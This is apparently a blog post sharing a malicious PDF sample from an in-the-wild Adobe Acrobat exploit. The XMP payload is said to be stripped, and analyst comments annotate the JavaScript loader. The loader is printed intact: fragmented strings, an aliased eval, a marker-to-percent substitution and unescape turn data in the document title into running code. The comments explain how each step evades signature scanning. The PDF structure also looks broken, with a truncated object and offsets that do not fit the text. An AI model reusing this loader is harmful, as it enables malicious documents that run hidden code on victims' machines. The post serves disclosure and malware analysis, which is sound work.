Apparently a zero-day PDF exploit is still in the wild, targeting unpatched Adobe Acrobat users. Here’s an actual exploited PDF file (with the XMP payload removed to prevent script kiddies from using it):
Virus scan: http://virusscan.jotti.org/en/scanresult/ac0da53fe0e1ba5a0cece750df99facf167c4f84
%PDF-1.6
%âãÏÓ
1 0 obj
<<
/Length 815
>>
stream
// Analyst note: globals for the decoder in this stream.
// WAR3waKpZWBejbjDeKi is later overwritten with the marker-substituted string.
// aMbR2mgd51lH4GSUJO6d is not referenced again in this stream; the later code
// uses MbR2mgd51lH4GSUJO6d (no leading "a"), so this declaration looks like
// leftover or decoy code.
var WAR3waKpZWBejbjDeKi = "";
var aMbR2mgd51lH4GSUJO6d = "";
// Analyst note: stage 1, fetch the encoded data.
// The concatenated string evaluates to
//   tfAPKu258gOq71H9nxm = this.info.title;
// It is split into fragments so that "this.info.title" never appears literally
// in the stream, presumably to defeat simple string signatures.
// The assignment target is undeclared, so it becomes an implicit global that
// the top-level code after the function definitions passes to the decoder.
// NOTE(review): in Acrobat JavaScript, document-level `this` is normally the
// Doc object, so this most likely reads the PDF's Title metadata. The script
// is therefore only a loader: the data it executes is carried in document
// metadata, not in this JavaScript stream. Confirm against the full sample.
function xxy()
{
return eval("tfAPKu258gOq71H9nxm = th"+"i"+"s.in"+"fo.ti"+"tle;");
}
// Analyst note: eval wrapper.
// Only the first parameter is used; the second and third are never read and
// the visible callers pass a single argument.
// eval is copied to a local alias before the call, so the call site does not
// contain the token sequence "eval(".
// NOTE(review): calling eval through an alias is an indirect eval under ES5
// rules, which runs the code in global scope. The caller relies on a `var`
// declared through this wrapper being visible afterwards, which matches that
// behaviour; the exact semantics depend on the reader's script engine.
function bk8ptS715zGdW3ifCpt(K285VuiNxOXl0ItyBL6,
K285VuiNxOXl0ItyBL6asd,SRg0oP9jIARmhGFqrxGfg)
{
var ReSPECTTTa = eval;
ReSPECTTTa(K285VuiNxOXl0ItyBL6);
}
// Analyst note: stage 2, decode the string and execute it.
// Only the first parameter (the encoded string) is used, and only from inside
// the eval'd source text; the other three parameters are never read.
// Steps:
//   1. A direct eval, which can see this function's locals, replaces every
//      occurrence of the marker "4563234 d 2342342 a 2343 b 342" in the input
//      with "%" and stores the result in the global WAR3waKpZWBejbjDeKi.
//      The input is thus turned into a percent-escaped string.
//   2. The eval wrapper runs
//        var MbR2mgd51lH4GSUJO6d = unescape(WAR3waKpZWBejbjDeKi);
//      with "unescape" split into fragments, decoding the %-escapes.
//   3. The decoded text is passed to the eval wrapper and executed as code.
// Static indicators visible here: the fixed marker regex, the aliased eval,
// and the fragmented "unescape" / "this.info.title" strings.
function aQ6T4bVlGiaAFcIK8C3(SRg0oP9jIARmhGFqrxG,WAR3waKpZWBejbjDeKisdf,
aQ6T4bVlGiaAFcIK8C3as,K285VuiNxOXl0ItyBL6a)
{
// Replacement character for the marker; kept in a variable so that the eval'd
// source contains no literal "%".
var iyX02nbW7zbkDGvdapf = "%";
// Source text for step 1. The statement has no trailing semicolon and relies
// on automatic semicolon insertion.
var FFFoFF = "WAR3waKpZWBejbjDeKi = SRg0oP9jIARmhGFqrxG.replace(/4563234 d 2342342 a 2343 b 342/g,iyX02nbW7zbkDGvdapf);"
var ReSPECTTT = FFFoFF; eval(ReSPECTTT);
// Step 2: decode the %-escapes into a variable declared via the eval wrapper.
bk8ptS715zGdW3ifCpt("var MbR2mgd51lH4GSUJO6d = u"+"n"+"e"+"s"+"cap"+"e(WAR3waKpZWBejbjDeKi);");
// Step 3: execute the decoded text. This is where data taken from the document
// becomes running code.
bk8ptS715zGdW3ifCpt(MbR2mgd51lH4GSUJO6d);
}
// Analyst note: entry point, run when the stream's script is executed.
// xxy() loads the title string into the global tfAPKu258gOq71H9nxm, which is
// then handed to the decoder as its only argument.
// With the payload stripped from this published copy, the title would not
// carry the encoded data, so the decode-and-eval chain has nothing meaningful
// to run here. The loader logic itself is intact.
xxy();
aQ6T4bVlGiaAFcIK8C3(tfAPKu258gOq71H9nxm);
endstream
endobj
2 0 obj
<<
/Subtype /XML
/Length 3453
/Type /Metadata
>>
stream
application/pdf
Miekiemoes
2008-09-24T19:47:56Z
Adobe
2010-07-05T15:03:59+01:00
2010-07-05T15:03:59+01:00
Notepad
uuid:62db894a-66c1-49be-8781-ec7649fbfea8
uuid:66d2ac0a-c842-40b1-9122-f7f594c6f814
endstream
endobj
3 0 obj
<<
/Length 155104
>>
stream
endstream
/Author (Miekiemoes)
/Producer (Notepad)
/ModDate (D:20100705150359+01'00')
/CreationDate (D:20080924194756Z)
>>
endobj xref
0 11
0000000000 65535 f
0000000015 00000 n
0000000884 00000 n
0000004422 00000 n
0000159583 00000 n
0000159857 00000 n
0000159642 00000 n
0000159686 00000 n
0000159734 00000 n
0000160030 00000 n
0000160114 00000 n
trailer
<<
/Info 10 0 R
/Root 8 0 R
/Size 11
/ID [ ]
>>
startxref
315416
%%EOF